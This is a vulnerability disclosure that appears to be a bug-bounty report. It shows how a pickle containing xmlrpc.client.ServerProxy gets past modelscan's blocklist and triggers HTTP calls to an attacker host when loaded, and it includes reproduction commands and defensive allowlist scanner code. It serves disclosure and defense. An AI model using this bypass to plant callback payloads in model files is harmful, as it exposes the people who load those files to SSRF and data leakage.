Modelscan Bypass PoC: xmlrpc.client.ServerProxy SSRF

Security research only. Do not use for malicious purposes.

Summary

The pickle creates an xmlrpc.client.ServerProxy pointing at an attacker-controlled host. xmlrpc.client is not in modelscan's unsafe_globals blocklist, so the file passes the scan. Any attribute access on the loaded object triggers an HTTP call to the attacker host.

Reproduction

pip install modelscan
modelscan scan -p pytorch_model.bin
# Result: No issues found

python3 -c "import pickle; pickle.load(open('pytorch_model.bin', 'rb'))"
# Result: Code executes
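As an added defensive example (not part of this PoC and not modelscan's own code), the script below shows the allowlist approach that closes this class of blocklist bypass: it disassembles a pickle with pickletools.genops to list every global the stream would import, flags anything outside an allowlist, and enforces the same allowlist at load time via Unpickler.find_class. The SAFE_GLOBALS set and both sample byte strings are constructed for illustration.

```python
import io
import pickle
import pickletools
from collections import OrderedDict

# Constructed allowlist of (module, name) pairs a model file is expected to
# import; in practice derive it from what your framework's saver emits.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
}

def referenced_globals(data: bytes):
    """Every (module, name) the pickle would import, found by disassembly only.

    pickletools.genops never executes anything. GLOBAL carries "module name"
    as its argument; STACK_GLOBAL takes its operands from the two preceding
    string pushes, which is how CPython's pickler emits it.
    """
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            refs.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            refs.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return refs

def scan(data: bytes):
    """Referenced globals that are NOT on the allowlist (empty set = clean)."""
    return {ref for ref in referenced_globals(data) if ref not in SAFE_GLOBALS}

class AllowlistUnpickler(pickle.Unpickler):
    """Enforcing control at load time. A blocklist fails on any module it
    forgot (xmlrpc.client here); an allowlist rejects everything not named."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")

def safe_load(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()

# Constructed samples. SUSPECT only pushes the ServerProxy class and stops;
# it instantiates nothing, so it is a detection fixture, not a payload.
BENIGN = pickle.dumps(OrderedDict(weight=[1.0, 2.0]), protocol=4)
SUSPECT = b"\x80\x04cxmlrpc.client\nServerProxy\n."
```

Running scan() over a real checkpoint before loading it reports every module the file would import, so a reference to xmlrpc.client stands out even though no blocklist names it.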

Affected

  • modelscan 0.7.6 (latest as of 2026-04-11)

Disclosure

Submitted to ProtectAI via Huntr.
